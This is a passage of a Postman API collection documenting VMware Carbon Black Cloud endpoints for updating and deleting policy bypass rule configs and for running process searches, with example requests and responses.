Configs","id":"4e64ebce-521e-4d34-b254-8d6c02f443c1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n    \"name\": \"Event Reporting and Sensor Operation Exclusions\",\n    \"description\": \"Allows customers to exclude specific processes and process events from reporting to CBC\",\n    \"inherited_from\": \"psc:region\",\n    \"category\": \"bypass\",\n    \"parameters\": {},\n    \"exclusions\": {\n        \"windows\": [\n            {\n                \"criteria\": [\n                    {\n                        \"type\": \"initiator_process\",\n                        \"attributes\": [\n                            {\n                                \"name\": \"process_name\",\n                                \"values\": [\n                                    \"**\\\\explorer.exe\"\n                                ]\n                            }\n                        ]\n                    },\n                    {\n                        \"type\": \"operation\",\n                        \"attributes\": [\n                            {\n                                \"name\": \"operation_type\",\n                                \"values\": [\n                                    \"ALL\"\n                                ]\n                            }\n                        ]\n                    }\n                ],\n                \"comments\": \"\",\n                \"apply_to_descendent_processes\": true,\n                \"type\": \"ENDPOINT_STANDARD_PROCESS_BYPASS\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/bypass","description":"<p>Update parameters for bypass rule configs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"id\": \"string\",\n  \"name\": \"string\",\n  \"description\": \"string\",\n  \"inherited_from\": \"string\",\n  \"category\": \"string\",\n  \"parameters\": {},\n  \"exclusions\": {\n    \"windows\": [\n      {\n        \"id\": integer,\n        \"criteria\": [\n          {\n            \"id\": integer,\n            \"type\": \"string\",\n            \"attributes\": [\n              {\n                \"id\": integer,\n                \"name\": \"string\",\n                \"values\": [\n                  \"string\"\n                ]\n              }\n            ]\n          }\n        ],\n        \"comments\": \"string\",\n        \"created_by\": \"string\",\n        \"created_at\": \"string\",\n        \"modified_by\": \"string\",\n        \"modified_at\": \"string\",\n        \"apply_to_descendent_processes\": bool,\n        \"type\": \"string\"\n      }\n    ]\n  }\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/#update-bypass-rule-configs\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","bypass"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"57ea44c4-5490-462e-ac8b-b1e88bd1f9c7","name":"Bypass Rule Configs - Event Reporting Exclusions","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n    \"name\": \"Event Reporting and Sensor Operation Exclusions\",\n    \"description\": \"Allows customers to exclude specific processes and process events from reporting to CBC\",\n    \"inherited_from\": \"psc:region\",\n    \"category\": \"bypass\",\n    \"parameters\": {},\n    \"exclusions\": {\n        \"windows\": [\n            {\n                \"criteria\": [\n                    {\n                        \"type\": \"initiator_process\",\n                        \"attributes\": [\n                            {\n                                \"name\": \"process_name\",\n                                \"values\": [\n                                    \"**\\\\explorer.exe\"\n                                ]\n                            }\n                        ]\n                    },\n                    {\n                        \"type\": \"operation\",\n                        \"attributes\": [\n                            {\n                                \"name\": \"operation_type\",\n                                \"values\": [\n                                    \"ALL\"\n                                ]\n                            }\n                        ]\n                    }\n                ],\n                \"comments\": \"\",\n                \"apply_to_descendent_processes\": true,\n                \"type\": \"ENDPOINT_STANDARD_PROCESS_BYPASS\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/bypass"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sat, 27 Jan 2024 13:29:45 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"504"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"_gorilla_csrf=MTcwNjM2MjE4NHxJbGxSU25KMFYyWjFXWHBXTldoNldUZHFSMGxwV0hRdk5XTmxNMHhZYm1KblUwaDNTVTV2TVRkblZqUTlJZ289fHMw36n6_E-Bayd1ocGBcWu8XgjNKQV3AeX8OwdXw-88; Path=/; Expires=Sun, 28 Jan 2024 01:29:44 GMT; Max-Age=43200; HttpOnly; Secure; SameSite=Lax"},{"key":"Traceid","value":"088416a1-228c-4c7c-a8eb-e695aa544607"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"successful\": [\n        {\n            \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n            \"name\": \"Event Reporting and Sensor Operation Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes and process events from reporting to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"bypass\",\n            \"parameters\": {},\n            \"exclusions\": {\n                \"windows\": [\n                    {\n                        \"id\": 8090,\n                        \"criteria\": [\n                            {\n                                \"id\": 13426,\n                                \"type\": \"initiator_process\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 93774,\n                                        \"name\": \"process_name\",\n                                        \"values\": [\n                                            \"**\\\\explorer.exe\"\n                                        ]\n                                    }\n                                ]\n                            },\n                            {\n                                \"id\": 13427,\n                                \"type\": \"operation\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 93775,\n                                        \"name\": \"operation_type\",\n                                        \"values\": [\n                                            \"ALL\"\n                                        ]\n                                    }\n                                ]\n                            }\n                        ],\n                        \"comments\": \"\",\n                        \"type\": \"ENDPOINT_STANDARD_PROCESS_BYPASS\",\n                        \"apply_to_descendent_processes\": true,\n                        \"created_by\": \"ABCD1234\",\n                        \"created_at\": \"2024-01-27T13:29:44.839Z\",\n                        \"modified_by\": \"ABCD1234\",\n                        \"modified_at\": \"2024-01-27T13:29:44.839Z\"\n                    }\n                ]\n            }\n        }\n    ],\n    \"failed\": []\n}"},{"id":"86560b1d-38ce-4f37-ab7d-ade5ae23bb2a","name":"Bypass Rule Configs - NGAV Reporting and Sensor Operations Exclusions","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n    \"name\": \"Event Reporting and Sensor Operation Exclusions\",\n    \"description\": \"Allows customers to exclude specific processes and process events from reporting to CBC\",\n    \"inherited_from\": \"psc:region\",\n    \"category\": \"bypass\",\n    \"parameters\": {},\n    \"exclusions\": {\n        \"windows\": [\n            {\n                \"criteria\": [\n                    {\n                        \"type\": \"initiator_process\",\n                        \"attributes\": [\n                            {\n                                \"name\": \"process_name\",\n                                \"values\": [\n                                    \"**\\\\explorer.exe\"\n                                ]\n                            }\n                        ]\n                    },\n                    {\n                        \"type\": \"operation\",\n                        \"attributes\": [\n                            {\n                                \"name\": \"operation_type\",\n                                \"values\": [\n                                    \"ALL\"\n                                ]\n                            }\n                        ]\n                    }\n                ],\n                \"comments\": \"\",\n                \"apply_to_descendent_processes\": true,\n                \"type\": \"ENDPOINT_STANDARD_PROCESS_BYPASS\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/bypass"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sun, 28 Jan 2024 14:39:25 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"506"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"_gorilla_csrf=MTcwNjQ1Mjc2NHxJa3B6VERCcFZFdzFaSGxEU1dGa1dtbFZTbEZzYVZWbFRWVlJlVWREVUVSMlpVWkZNekZMT0ZSUE1FRTlJZ289fFGMkTAfDk7rZH-AFLDu1L8rtLixFAuberbQVNeyQcC5; Path=/; Expires=Mon, 29 Jan 2024 02:39:24 GMT; Max-Age=43200; HttpOnly; Secure; SameSite=Lax"},{"key":"Traceid","value":"7ed86c53-3b6f-4d94-8edf-dd8b88d29d09"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"successful\": [\n        {\n            \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n            \"name\": \"Event Reporting and Sensor Operation Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes and process events from reporting to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"bypass\",\n            \"parameters\": {},\n            \"exclusions\": {\n                \"windows\": [\n                    {\n                        \"id\": 8122,\n                        \"criteria\": [\n                            {\n                                \"id\": 13486,\n                                \"type\": \"initiator_process\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 94230,\n                                        \"name\": \"process_name\",\n                                        \"values\": [\n                                            \"**\\\\explorer.exe\"\n                                        ]\n                                    }\n                                ]\n                            },\n                            {\n                                \"id\": 13487,\n                                \"type\": \"operation\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 94231,\n                                        \"name\": \"operation_type\",\n                                        \"values\": [\n                                            \"ALL\"\n                                        ]\n                                    }\n                                ]\n                            }\n                        ],\n                        \"comments\": \"\",\n                        \"type\": \"ENDPOINT_STANDARD_PROCESS_BYPASS\",\n                        \"apply_to_descendent_processes\": true,\n                        \"created_by\": \"ABCD1234\",\n                        \"created_at\": \"2024-01-28T14:39:25.121Z\",\n                        \"modified_by\": \"ABCD1234\",\n                        \"modified_at\": \"2024-01-28T14:39:25.121Z\"\n                    }\n                ]\n            }\n        }\n    ],\n    \"failed\": []\n}"},{"id":"c568ef99-b743-47e1-b0a4-9cfbdc47aecf","name":"Bypass Rule Configs - NGAV Reporting and All Reporting","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n    \"exclusions\": {\n        \"windows\": [\n            {\n                \"apply_to_descendent_processes\": true,\n                \"comments\": \"\",\n                \"type\": \"ENDPOINT_STANDARD_PROCESS_BYPASS\",\n                \"criteria\": [\n                    {\n                        \"type\": \"initiator_process\",\n                        \"attributes\": [\n                            {\n                                \"name\": \"process_name\",\n                                \"values\": [\n                                    \"**\\\\explorer.exe\"\n                                ]\n                            }\n                        ]\n                    },\n                    {\n                        \"type\": \"operation\",\n                        \"attributes\": [\n                            {\n                                \"name\": \"operation_type\",\n                                \"values\": [\n                                    \"ALL\"\n                                ]\n                            }\n                        ]\n                    }\n                ]\n            },\n            {\n                \"criteria\": [\n                    {\n                        \"type\": \"initiator_process\",\n                        \"attributes\": [\n                            {\n                                \"name\": \"process_name\",\n                                \"values\": [\n                                    \"**\\\\powershell.exe\"\n                                ]\n                            }\n                        ]\n                    },\n                    {\n                        \"type\": \"operation\",\n                        \"attributes\": [\n                            {\n                                \"name\": \"operation_type\",\n                                \"values\": [\n                                    \"ALL\"\n                                ]\n                            }\n                        ]\n                    }\n                ],\n                \"comments\": \"\",\n                \"apply_to_descendent_processes\": true,\n                \"type\": \"EVENT_REPORTING_AND_SENSOR_OPERATIONS\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/bypass"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sun, 28 Jan 2024 15:35:01 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"542"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Traceid","value":"6321fbc6-9220-4377-a52e-de7ffa7f5ab6"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"successful\": [\n        {\n            \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n            \"name\": \"Event Reporting and Sensor Operation Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes and process events from reporting to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"bypass\",\n            \"exclusions\": {\n                \"windows\": [\n                    {\n                        \"id\": 8124,\n                        \"criteria\": [\n                            {\n                                \"id\": 13490,\n                                \"type\": \"initiator_process\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 94234,\n                                        \"name\": \"process_name\",\n                                        \"values\": [\n                                            \"**\\\\explorer.exe\"\n                                        ]\n                                    }\n                                ]\n                            },\n                            {\n                                \"id\": 13491,\n                                \"type\": \"operation\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 94235,\n                                        \"name\": \"operation_type\",\n                                        \"values\": [\n                                            \"ALL\"\n                                        ]\n                                    }\n                                ]\n                            }\n                        ],\n                        \"comments\": \"\",\n                        \"type\": \"ENDPOINT_STANDARD_PROCESS_BYPASS\",\n                        \"apply_to_descendent_processes\": true,\n                        \"created_by\": \"ABCD1234\",\n                        \"created_at\": \"2024-01-28T15:35:01.153Z\",\n                        \"modified_by\": \"ABCD1234\",\n                        \"modified_at\": \"2024-01-28T15:35:01.153Z\"\n                    },\n                    {\n                        \"id\": 8125,\n                        \"criteria\": [\n                            {\n                                \"id\": 13492,\n                                \"type\": \"initiator_process\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 94236,\n                                        \"name\": \"process_name\",\n                                        \"values\": [\n                                            \"**\\\\powershell.exe\"\n                                        ]\n                                    }\n                                ]\n                            },\n                            {\n                                \"id\": 13493,\n                                \"type\": \"operation\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 94237,\n                                        \"name\": \"operation_type\",\n                                        \"values\": [\n                                            \"ALL\"\n                                        ]\n                                    }\n                                ]\n                            }\n                        ],\n                        \"comments\": \"\",\n                        \"type\": \"EVENT_REPORTING_AND_SENSOR_OPERATIONS\",\n                        \"apply_to_descendent_processes\": true,\n                        \"created_by\": \"ABCD1234\",\n                        \"created_at\": \"2024-01-28T15:35:01.163Z\",\n                        \"modified_by\": \"ABCD1234\",\n                        \"modified_at\": \"2024-01-28T15:35:01.163Z\"\n                    }\n                ]\n            }\n        }\n    ],\n    \"failed\": []\n}"}],"_postman_id":"4e64ebce-521e-4d34-b254-8d6c02f443c1"},{"name":"Delete User Parameters for All Bypass Rule Configs.","id":"ad2d762d-4e63-49b2-b425-6a4a52a56d73","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/bypass","description":"<p>Delete user parameters for all bypass rule configs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/#delete-bypass-rule-configs\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","bypass"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"ad2d762d-4e63-49b2-b425-6a4a52a56d73"}],"id":"39945adf-4a5d-441f-8482-201c5a00da77","_postman_id":"39945adf-4a5d-441f-8482-201c5a00da77","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}}],"id":"363ecde9-1cae-4f1a-b47b-53ab8e814ff8","description":"<h1 id=\"overview\">Overview</h1>\n<p>Policies are where users go to manage their security posture in their organization. Choose one of VMware Carbon Black’s predefined policies as a starting point, and tune its default prevention settings as you see fit in your environment. Often times, users may need to add exceptions for special programs in their environment that perform anomalous behavior. Similarly, users may want to explicitly block certain programs from executing in their environment. Users can leverage the Policies API to achieve all types of policy and sensor setting adjustments.</p>\n<h2 id=\"key-features\">Key Features</h2>\n<p>*   Create or modify policies\n*   Manage prevention rules on existing policies\n*   Adjust sensor settings</p>\n<h2 id=\"use-cases\">Use Cases</h2>\n<p>*   Add Blocking and Isolation or Permission rules to prevent ransomware-like behavior\n*   Adjust the frequency and intensity of signature updates and the local scanner\n*   Modify certain sensor behaviors via the sensor settings</p>\n","_postman_id":"363ecde9-1cae-4f1a-b47b-53ab8e814ff8","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Process Search API","item":[{"name":"Calls for Processes","item":[{"name":"Process Search Suggestions (v2)","id":"4f467a09-726a-4866-9e25-b8d3cd159ea7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/search_suggestions?suggest.q=process_cmd","description":"<p>Returns suggestions for a process search selected from fields and values as reported in the organization’s system. Will return values for the specified field if at least one character follows the colon. Returns null if no characters follow the colon.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#process-search-suggestions-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","search_suggestions"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>Number of suggestions to return\nDefault: 50</p>\n","type":"text/plain"},"key":"suggest.count","value":"50"},{"key":"suggest.q","value":"process_cmd"}],"variable":[]}},"response":[],"_postman_id":"4f467a09-726a-4866-9e25-b8d3cd159ea7"},{"name":"Process Search Validation (v2)","id":"9b34c5e0-05e1-4860-a2ec-743deb78db14","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"query\": \"process_name:chrome.exe\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/search_validation","description":"<p>Validates a given process query and potentially gives suggestions on how to fix invalid queries.</p>\n<h2 id=\"request-schema\">Request Schema</h2>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"valid\": true,\n    \"value_search_query\": true\n}\n\n</code></pre>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#process-search-validation-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","search_validation"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"80c39c0c-4703-4fe4-99f1-e9f8c5796503","name":"Process Search Validation (v2) - Validation Failure","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"query\": \"bad_process_name:chrome.exe\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/search_validation"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Apr 2023 16:36:35 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"158"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"invalid_message\": \"org.apache.solr.common.SolrException: undefined field bad_process_name\",\n    \"valid\": false,\n    \"value_search_query\": false,\n    \"invalid_trigger_offset\": 0\n}"}],"_postman_id":"9b34c5e0-05e1-4860-a2ec-743deb78db14"},{"name":"Get Time Limits for Available Data (v1)","id":"f1410473-ffb4-410a-b60d-999900af8ba1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/processes/limits","description":"<p>Returns the minimum and maximum times at which events were reported by any sensor in your organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#get-time-limits-for-available-data-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","processes","limits"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"f1410473-ffb4-410a-b60d-999900af8ba1"},{"name":"Start a Process Search (v2)","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"19c59c6e-ca7b-48c6-8223-897276ead581"}}],"id":"8bc26906-b2b9-4606-8fb3-7f84ccfc8db0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"hash:{{sha256}}\",\n    \"rows\": 5000,\n    \"time_range\": {\n        \"window\": \"-2w\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/search_jobs","description":"<p>Creates a process search job. The results for the search job may be requested using the job_id returned.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#start-a-process-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","search_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"993c2943-b518-4683-b80f-8c2dd62165f4","name":"Get all unknown or mailicious processes with extra fields","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"fields\": [\n        \"*\",\n        \"process_effective_reputation\",\n        \"process_reputation\",\n        \"process_sha256\",\n        \"process_cmdline\",\n        \"parent_reputation\",\n        \"parent_guid\",\n        \"parent_hash\",\n        \"parent_name\",\n        \"parent_effective_reputation\"\n    ],\n    \"rows\": 5000,\n    \"time_range\": {\n        \"window\": \"-1h\"\n    },\n    \"query\": \"process_effective_reputation:NOT_LISTED OR process_effective_reputation:KNOWN_MALWARE OR process_effective_reputation:COMPANY_BLACK_LIST OR process_effective_reputation:PUP OR process_effective_reputation:SUSPECT_MALWARE OR process_effective_reputation:UNKNOWN\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/search_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 03 Dec 2020 19:45:43 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"49"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"f6f0e714-85cb-4176-bf1e-cec08fa64a46\"\n}"},{"id":"70af1352-7b85-4f75-81b1-32c5aa6e11c1","name":"Search for Processes by Username","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"process_username:\\\"NT AUTHORITY\\\\\\\\NETWORK SERVICE\\\"\",\n    \"sort\": [\n        {\n            \"field\": \"device_timestamp\",\n            \"order\": \"asc\"\n        }\n    ],\n    \"start\": 0,\n    \"rows\": 25\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/search_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 13 May 2021 14:51:13 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"49"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"1c2ccbf4-5709-4acf-a74f-55d0a8f09e40\"\n}"}],"_postman_id":"8bc26906-b2b9-4606-8fb3-7f84ccfc8db0"},{"name":"Retrieve Results for a Process Search 